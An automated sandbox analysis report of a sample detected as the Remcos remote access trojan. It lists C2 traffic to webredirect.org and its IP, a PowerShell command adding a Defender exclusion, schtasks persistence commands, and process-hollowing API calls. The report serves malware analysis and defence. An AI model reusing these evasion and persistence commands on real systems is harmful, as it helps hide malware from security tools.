                        Jan 10, 2025 17:32:45.963140011 CET4998245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:46.010931969 CET4998245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:32:46.015680075 CET456824998269.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:07.360903978 CET456824998269.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:07.360991955 CET4998245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:07.361078024 CET4998245682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:07.366969109 CET456824998269.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:08.370412111 CET4998345682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:08.375297070 CET456824998369.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:08.375374079 CET4998345682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:08.379431009 CET4998345682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:08.384246111 CET456824998369.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:29.740257025 CET456824998369.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:29.740355968 CET4998345682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:29.751398087 CET4998345682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:29.756211042 CET456824998369.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:30.761076927 CET4998445682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:30.765966892 CET456824998469.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:30.770947933 CET4998445682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:30.774450064 CET4998445682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:30.779299021 CET456824998469.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:52.156928062 CET456824998469.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:52.157023907 CET4998445682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:52.157078981 CET4998445682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:52.161904097 CET456824998469.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:53.167246103 CET4998545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:53.172205925 CET456824998569.174.98.48192.168.2.7
                        Jan 10, 2025 17:33:53.172291994 CET4998545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:53.176542997 CET4998545682192.168.2.769.174.98.48
                        Jan 10, 2025 17:33:53.181449890 CET456824998569.174.98.48192.168.2.7
                        Jan 10, 2025 17:34:14.597001076 CET456824998569.174.98.48192.168.2.7
                        Jan 10, 2025 17:34:14.597080946 CET4998545682192.168.2.769.174.98.48

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 10, 2025 17:30:08.639758110 CET5367153192.168.2.71.1.1.1
                        Jan 10, 2025 17:30:08.803601980 CET53536711.1.1.1192.168.2.7
                        Jan 10, 2025 17:32:23.213291883 CET5492753192.168.2.71.1.1.1
                        Jan 10, 2025 17:32:23.458389997 CET53549271.1.1.1192.168.2.7

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 10, 2025 17:30:08.639758110 CET192.168.2.71.1.1.10xc2dStandard query (0)decmainserver.webredirect.orgA (IP address)IN (0x0001)false
                        Jan 10, 2025 17:32:23.213291883 CET192.168.2.71.1.1.10x2b54Standard query (0)decmainserver.webredirect.orgA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 10, 2025 17:30:08.803601980 CET1.1.1.1192.168.2.70xc2dNo error (0)decmainserver.webredirect.org69.174.98.48A (IP address)IN (0x0001)false
                        Jan 10, 2025 17:32:23.458389997 CET1.1.1.1192.168.2.70x2b54No error (0)decmainserver.webredirect.org69.174.98.48A (IP address)IN (0x0001)false

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:11:30:05
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0xec0000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:3
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"
                        Imagebase:0xa00000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"
                        Imagebase:0x740000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:11:30:08
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0x470000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:9
                        Start time:11:30:08
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0x130000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:10
                        Start time:11:30:08
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0xff0000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:11
                        Start time:11:30:09
                        Start date:10/01/2025
                        Path:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        Imagebase:0xb10000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 71%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:12
                        Start time:11:30:10
                        Start date:10/01/2025
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff7fb730000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:11:30:12
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp"
                        Imagebase:0x740000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:14
                        Start time:11:30:12
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:15
                        Start time:11:30:13
                        Start date:10/01/2025
                        Path:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\RTdozXra.exe"
                        Imagebase:0xa70000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:10.4%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:138
                          Total number of Limit Nodes:4
                          execution_graph 76095 592a1e0 76097 592a22e DrawTextExW 76095->76097 76098 592a286 76097->76098 75945 313b330 75946 313b33f 75945->75946 75948 313b417 75945->75948 75949 313b45c 75948->75949 75950 313b439 75948->75950 75949->75946 75950->75949 75951 313b660 GetModuleHandleW 75950->75951 75952 313b68d 75951->75952 75952->75946 75953 313d6c0 75954 313d6c1 75953->75954 75958 313d8a0 75954->75958 75962 313d890 75954->75962 75955 313d7f3 75959 313d8a1 75958->75959 75966 313b314 75959->75966 75963 313d894 75962->75963 75964 313b314 DuplicateHandle 75963->75964 75965 313d8ce 75964->75965 75965->75955 75967 313d908 DuplicateHandle 75966->75967 75969 313d8ce 75967->75969 75969->75955 75930 8d4ebc0 75931 8d4ebe6 75930->75931 75932 8d4ec40 75931->75932 75934 8f912da 75931->75934 75936 8f912f9 75934->75936 75935 8f9132f 75935->75932 75936->75935 75939 8f915c8 75936->75939 75943 8f915d0 PostMessageW 75936->75943 75940 8f915cf PostMessageW 75939->75940 75941 8f915c2 75939->75941 75942 8f9163c 75940->75942 75941->75939 75942->75936 75944 8f9163c 75943->75944 75944->75936 76099 3134668 76100 3134669 76099->76100 76101 3134686 76100->76101 76103 3134779 76100->76103 76104 313479d 76103->76104 76108 3134888 76104->76108 76112 3134878 76104->76112 76109 31348af 76108->76109 76111 313498c 76109->76111 76116 31344b0 76109->76116 76114 3134889 76112->76114 76113 313498c 76113->76113 76114->76113 76115 31344b0 CreateActCtxA 76114->76115 76115->76113 76117 3135918 CreateActCtxA 76116->76117 76119 31359db 76117->76119 75970 8eedb33 75974 8eefda9 75970->75974 75987 8eefdb8 75970->75987 75971 8eedafb 75975 8eefda3 75974->75975 75975->75974 75976 8eefdda 75975->75976 76000 8f90583 75975->76000 76004 8f90732 75975->76004 76010 8f90bf7 75975->76010 76014 8f905d1 75975->76014 76018 8f908b1 75975->76018 76023 8f9045a 75975->76023 76027 8f905be 75975->76027 76032 8f9079b 75975->76032 76037 8f90b62 75975->76037 76042 8f9080e 75975->76042 75976->75971 75988 8eefdd2 75987->75988 75989 8f9079b 2 API calls 75988->75989 75990 8f9045a 2 API calls 75988->75990 75991 8f905be 2 API calls 75988->75991 75992 8f905d1 2 API calls 75988->75992 75993 8f908b1 2 API calls 75988->75993 75994 8f90732 4 API calls 75988->75994 75995 8f90bf7 2 API calls 75988->75995 75996 8eefdda 75988->75996 75997 8f9080e 2 API calls 75988->75997 75998 8f90583 2 API calls 75988->75998 75999 8f90b62 2 API calls 75988->75999 75989->75996 75990->75996 75991->75996 75992->75996 75993->75996 75994->75996 75995->75996 75996->75971 75997->75996 75998->75996 75999->75996 76047 8eecb10 76000->76047 76051 8eecb18 76000->76051 76001 8f905a2 76001->75976 76055 8eed020 76004->76055 76059 8eed028 76004->76059 76005 8f90750 76063 8eed0e0 76005->76063 76067 8eed0e8 76005->76067 76011 8f90c2d 76010->76011 76012 8eed0e8 WriteProcessMemory 76010->76012 76013 8eed0e0 WriteProcessMemory 76010->76013 76012->76011 76013->76011 76071 8eed1d0 76014->76071 76075 8eed1d8 76014->76075 76015 8f905f3 76015->75976 76019 8f908d4 76018->76019 76021 8eed0e8 WriteProcessMemory 76019->76021 76022 8eed0e0 WriteProcessMemory 76019->76022 76020 8f90c2d 76021->76020 76022->76020 76079 8eed365 76023->76079 76083 8eed370 76023->76083 76028 8f905cb 76027->76028 76087 8eeca60 76028->76087 76091 8eeca68 76028->76091 76029 8f907ce 76033 8f907a1 76032->76033 76035 8eeca68 ResumeThread 76033->76035 76036 8eeca60 ResumeThread 76033->76036 76034 8f907ce 76035->76034 76036->76034 76038 8f90cb7 76037->76038 76040 8eed0e8 WriteProcessMemory 76038->76040 76041 8eed0e0 WriteProcessMemory 76038->76041 76039 8f90d97 76040->76039 76041->76039 76043 8f904b2 76042->76043 76043->76042 76044 8f904c4 76043->76044 76045 8eecb18 Wow64SetThreadContext 76043->76045 76046 8eecb10 Wow64SetThreadContext 76043->76046 76044->75976 76045->76043 76046->76043 76048 8eecb0a 76047->76048 76048->76047 76049 8eecb7d Wow64SetThreadContext 76048->76049 76050 8eecba5 76049->76050 76050->76001 76052 8eecb5d Wow64SetThreadContext 76051->76052 76054 8eecba5 76052->76054 76054->76001 76056 8eed068 VirtualAllocEx 76055->76056 76058 8eed0a5 76056->76058 76058->76005 76060 8eed068 VirtualAllocEx 76059->76060 76062 8eed0a5 76060->76062 76062->76005 76064 8eed130 WriteProcessMemory 76063->76064 76066 8eed187 76064->76066 76066->76005 76068 8eed130 WriteProcessMemory 76067->76068 76070 8eed187 76068->76070 76070->76005 76072 8eed223 ReadProcessMemory 76071->76072 76074 8eed267 76072->76074 76074->76015 76076 8eed223 ReadProcessMemory 76075->76076 76078 8eed267 76076->76078 76078->76015 76080 8eed3f9 CreateProcessA 76079->76080 76082 8eed5bb 76080->76082 76082->76082 76084 8eed3f9 CreateProcessA 76083->76084 76086 8eed5bb 76084->76086 76086->76086 76088 8eecaa8 ResumeThread 76087->76088 76090 8eecad9 76088->76090 76090->76029 76092 8eecaa8 ResumeThread 76091->76092 76094 8eecad9 76092->76094 76094->76029

                          Executed Functions

                          Function 076F8C78 Relevance: 27.5, Strings: 21, Instructions: 1232COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$,q$,q$4cq$4cq$hq$hq$hq$|bq$|bq$|bq$$q$$q$$q$;($[0$cq$cq$cq$cq$k0
                          • API String ID: 0-3551593092
                          • Opcode ID: 23dd64ed22bc3ffeb42380235fe3ccf193b50497144f339a9b96210a3dc6f9a7
                          • Instruction ID: 9c6b57f74f39a9817fc272d9e4321e9c26a531c35b622289a89182a6b7eb035a
                          • Opcode Fuzzy Hash: 23dd64ed22bc3ffeb42380235fe3ccf193b50497144f339a9b96210a3dc6f9a7
                          • Instruction Fuzzy Hash: C3B208B4B006158FDB24DF29C894B69BBF2BF89310F1585A9E54ADB361DB30EC81CB51
                          Function 08EE11B0 Relevance: 16.8, Strings: 13, Instructions: 552COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1065 8ee11b0-8ee11cb 1066 8ee124e-8ee1255 1065->1066 1067 8ee1260-8ee1298 1066->1067 1071 8ee129f-8ee12a1 1067->1071 1072 8ee11d0-8ee11d3 1071->1072 1073 8ee11dc-8ee11f0 1072->1073 1074 8ee11d5 1072->1074 1077 8ee12ed-8ee1350 1073->1077 1078 8ee11f6-8ee120a 1073->1078 1074->1066 1074->1071 1074->1073 1075 8ee12a6-8ee12c1 1074->1075 1085 8ee12d9-8ee12ec 1075->1085 1086 8ee12c3-8ee12c9 1075->1086 1087 8ee1372-8ee139d 1077->1087 1078->1077 1080 8ee1210-8ee121e 1078->1080 1080->1077 1081 8ee1224-8ee1237 1080->1081 1081->1077 1084 8ee123d-8ee124c 1081->1084 1084->1072 1088 8ee12cd-8ee12cf 1086->1088 1089 8ee12cb 1086->1089 1092 8ee174b-8ee17da 1087->1092 1093 8ee13a3-8ee13b3 1087->1093 1088->1085 1089->1085 1098 8ee180d-8ee1816 1092->1098 1093->1092 1094 8ee13b9-8ee13cb 1093->1094 1094->1092 1095 8ee13d1-8ee13dd 1094->1095 1097 8ee1352-8ee1355 1095->1097 1101 8ee135e-8ee1370 1097->1101 1102 8ee1357 1097->1102 1099 8ee181c-8ee1828 1098->1099 1100 8ee1946-8ee194e 1098->1100 1103 8ee17dc-8ee17df 1099->1103 1101->1097 1102->1087 1102->1101 1104 8ee148e-8ee14a2 1102->1104 1105 8ee152d-8ee1534 1102->1105 1106 8ee1509-8ee1528 1102->1106 1107 8ee1547-8ee155d 1102->1107 1108 8ee1647-8ee164f 1102->1108 1109 8ee15a4-8ee15a6 1102->1109 1110 8ee1442-8ee1477 1102->1110 1111 8ee13e2-8ee13f8 1102->1111 1112 8ee1580-8ee159f 1102->1112 1113 8ee141c-8ee1420 1102->1113 1114 8ee171a-8ee171e 1102->1114 1115 8ee1654-8ee165a 1102->1115 1116 8ee1692-8ee1694 1102->1116 1126 8ee17e8-8ee17f9 1103->1126 1127 8ee17e1 1103->1127 1176 8ee14a8 1104->1176 1177 8ee14a4-8ee14a6 1104->1177 1124 8ee1536 1105->1124 1125 8ee1540-8ee1545 1105->1125 1106->1097 1107->1092 1163 8ee1563-8ee157b 1107->1163 1108->1097 1131 8ee15b8 1109->1131 1132 8ee15a8-8ee15b6 1109->1132 1110->1092 1198 8ee147d-8ee1489 1110->1198 1111->1092 1170 8ee13fe-8ee1409 1111->1170 1112->1097 1128 8ee1436 1113->1128 1129 8ee1422-8ee142b 1113->1129 1118 8ee173f 1114->1118 1119 8ee1720-8ee1729 1114->1119 1120 8ee165c-8ee1663 1115->1120 1121 8ee1677-8ee167e 1115->1121 1122 8ee1696-8ee169c 1116->1122 1123 8ee16b2 1116->1123 1136 8ee1742-8ee1748 1118->1136 1133 8ee172b-8ee172e 1119->1133 1134 8ee1730-8ee1733 1119->1134 1120->1092 1135 8ee1669-8ee166d 1120->1135 1121->1092 1137 8ee1684-8ee1690 1121->1137 1139 8ee169e-8ee16a0 1122->1139 1140 8ee16a2-8ee16ae 1122->1140 1155 8ee16b4-8ee16d4 1123->1155 1141 8ee153b 1124->1141 1125->1141 1126->1100 1187 8ee17ff-8ee180b 1126->1187 1127->1098 1127->1126 1142 8ee187e-8ee1890 1127->1142 1143 8ee18cc-8ee18d1 1127->1143 1144 8ee18bd-8ee18c5 1127->1144 1145 8ee186d-8ee1872 1127->1145 1146 8ee182a-8ee183c 1127->1146 1147 8ee1929-8ee1933 1127->1147 1148 8ee1866-8ee186b 1127->1148 1149 8ee1874-8ee1879 1127->1149 1150 8ee1895-8ee18a6 1127->1150 1151 8ee1901-8ee1903 1127->1151 1156 8ee1439-8ee143f 1128->1156 1153 8ee142d-8ee1430 1129->1153 1154 8ee1432 1129->1154 1158 8ee15ba-8ee15d6 1131->1158 1132->1158 1161 8ee173d 1133->1161 1134->1161 1169 8ee1672 1135->1169 1137->1169 1173 8ee16b0 1139->1173 1140->1173 1141->1097 1142->1103 1167 8ee18d6-8ee18e1 1143->1167 1168 8ee18d3 1143->1168 1144->1143 1166 8ee1861 1145->1166 1164 8ee183e 1146->1164 1165 8ee1845-8ee184f 1146->1165 1147->1100 1175 8ee1935-8ee1941 1147->1175 1148->1166 1149->1103 1150->1100 1194 8ee18ac-8ee18b8 1150->1194 1171 8ee191d-8ee1926 1151->1171 1172 8ee1905-8ee190b 1151->1172 1174 8ee1434 1153->1174 1154->1174 1203 8ee16d6-8ee16df 1155->1203 1204 8ee16f5 1155->1204 1158->1092 1193 8ee15dc-8ee160c 1158->1193 1161->1136 1163->1097 1164->1145 1164->1148 1164->1165 1165->1100 1189 8ee1855-8ee185c 1165->1189 1166->1103 1180 8ee18fa-8ee18ff 1167->1180 1181 8ee18e3-8ee18e7 1167->1181 1168->1167 1169->1097 1182 8ee140b 1170->1182 1183 8ee1415-8ee141a 1170->1183 1184 8ee190f-8ee191b 1172->1184 1185 8ee190d 1172->1185 1173->1155 1174->1156 1175->1103 1178 8ee14ab-8ee14cc 1176->1178 1177->1178 1178->1092 1210 8ee14d2-8ee14ee 1178->1210 1196 8ee18f5 1180->1196 1181->1100 1195 8ee18e9-8ee18f0 1181->1195 1197 8ee1410 1182->1197 1183->1197 1184->1171 1185->1171 1187->1103 1189->1166 1193->1092 1209 8ee1612-8ee1630 1193->1209 1194->1103 1195->1196 1196->1103 1197->1097 1198->1097 1206 8ee16e6-8ee16e9 1203->1206 1207 8ee16e1-8ee16e4 1203->1207 1208 8ee16f8-8ee170a 1204->1208 1211 8ee16f3 1206->1211 1207->1211 1208->1092 1214 8ee170c-8ee1715 1208->1214 1209->1092 1216 8ee1636-8ee1642 1209->1216 1210->1092 1217 8ee14f4-8ee1504 1210->1217 1211->1208 1214->1097 1216->1097 1217->1097
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$8q$8q$LRq$LRq$LRq$$q$$q$$q$$q$$q$$q$$q
                          • API String ID: 0-3043932997
                          • Opcode ID: 619217f6e4970358568b0f2415b59720a29669957088ddcdcdd0463531e2d192
                          • Instruction ID: 45e918361f0bc1dbbd43410521d21569023203fc3c3ca48af95902a1f363030c
                          • Opcode Fuzzy Hash: 619217f6e4970358568b0f2415b59720a29669957088ddcdcdd0463531e2d192
                          • Instruction Fuzzy Hash: 6D22B372E04218CFC714CBA9D8446ADBBB2FF85703F19916AE856DB251D7349C82CB51
                          Function 076F58C0 Relevance: 5.6, Strings: 4, Instructions: 566COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1580 76f58c0-76f5920 1583 76f5926-76f592f 1580->1583 1584 76f59f1-76f59fb 1580->1584 1587 76f5c68-76f5cb4 1583->1587 1588 76f5935-76f5940 1583->1588 1585 76f59fd-76f5a06 1584->1585 1586 76f5a07-76f5a0b 1584->1586 1589 76f5c32-76f5c4e 1586->1589 1590 76f5a11-76f5a3d 1586->1590 1597 76f5cba 1587->1597 1598 76f5fa8-76f5faa 1587->1598 1591 76f5946-76f596d 1588->1591 1592 76f59e1-76f59eb 1588->1592 1739 76f5c50 call 76f6940 1589->1739 1740 76f5c50 call 76f6930 1589->1740 1617 76f5c2f 1590->1617 1618 76f5a43-76f5a49 1590->1618 1737 76f596f call 76f58c0 1591->1737 1738 76f596f call 76f58b0 1591->1738 1592->1583 1592->1584 1597->1598 1600 76f5dce-76f5de2 1597->1600 1601 76f5e9e-76f5eb3 1597->1601 1602 76f5f3c-76f5f57 1597->1602 1603 76f5d5b-76f5d79 1597->1603 1604 76f5ce8-76f5d06 1597->1604 1605 76f5cd6-76f5ce3 1597->1605 1606 76f5cc1-76f5cd1 1597->1606 1607 76f5e11-76f5e1b 1597->1607 1608 76f5e20-76f5e39 1597->1608 1599 76f5fad-76f5fb7 1598->1599 1612 76f5fba-76f5fbf 1600->1612 1613 76f5de8-76f5deb 1600->1613 1637 76f5eb9 1601->1637 1638 76f5eb5-76f5eb7 1601->1638 1634 76f5f5d 1602->1634 1635 76f5f59-76f5f5b 1602->1635 1631 76f5d7f 1603->1631 1632 76f5d7b-76f5d7d 1603->1632 1639 76f5d0c 1604->1639 1640 76f5d08-76f5d0a 1604->1640 1605->1599 1606->1599 1607->1599 1628 76f5e3f 1608->1628 1629 76f5e3b-76f5e3d 1608->1629 1609 76f5c56-76f5c67 1611 76f5975-76f5977 1621 76f5979-76f597d 1611->1621 1622 76f59a8-76f59b1 1611->1622 1625 76f5dff-76f5e0c 1613->1625 1626 76f5ded-76f5dfa 1613->1626 1617->1589 1633 76f5a4c-76f5a57 1618->1633 1621->1622 1636 76f597f-76f59a1 1621->1636 1641 76f59bc-76f59bf 1622->1641 1642 76f59b3-76f59ba 1622->1642 1625->1599 1626->1599 1644 76f5e42-76f5e6d 1628->1644 1629->1644 1645 76f5d82-76f5dc9 1631->1645 1632->1645 1633->1587 1646 76f5a5d-76f5a62 1633->1646 1647 76f5f60-76f5fa6 1634->1647 1635->1647 1636->1622 1649 76f5ebc-76f5ee6 1637->1649 1638->1649 1651 76f5d0f-76f5d2e 1639->1651 1640->1651 1654 76f59c6-76f59d4 1641->1654 1642->1641 1652 76f59c1-76f59c3 1642->1652 1644->1612 1672 76f5e73-76f5e99 1644->1672 1645->1599 1656 76f5a68-76f5a6e 1646->1656 1657 76f5c20-76f5c29 1646->1657 1647->1599 1674 76f5eec 1649->1674 1675 76f5ee8-76f5eea 1649->1675 1741 76f5d30 call 76f5ff0 1651->1741 1742 76f5d30 call 76f6000 1651->1742 1652->1654 1654->1587 1655 76f59da-76f59de 1654->1655 1655->1592 1656->1587 1661 76f5a74-76f5a7d 1656->1661 1657->1617 1657->1633 1661->1587 1665 76f5a83-76f5a8e 1661->1665 1665->1657 1678 76f5a94-76f5aa7 1665->1678 1672->1599 1680 76f5eef-76f5f3a 1674->1680 1675->1680 1676 76f5d36-76f5d56 1676->1599 1678->1587 1682 76f5aad-76f5abf 1678->1682 1680->1599 1686 76f5ac1-76f5ac4 1682->1686 1687 76f5ad0-76f5ad3 1682->1687 1690 76f5adf-76f5ae5 1686->1690 1691 76f5ac6-76f5ac9 1686->1691 1692 76f5aef-76f5af8 1687->1692 1693 76f5ad5-76f5ad8 1687->1693 1702 76f5b03-76f5b0f 1690->1702 1697 76f5acb 1691->1697 1698 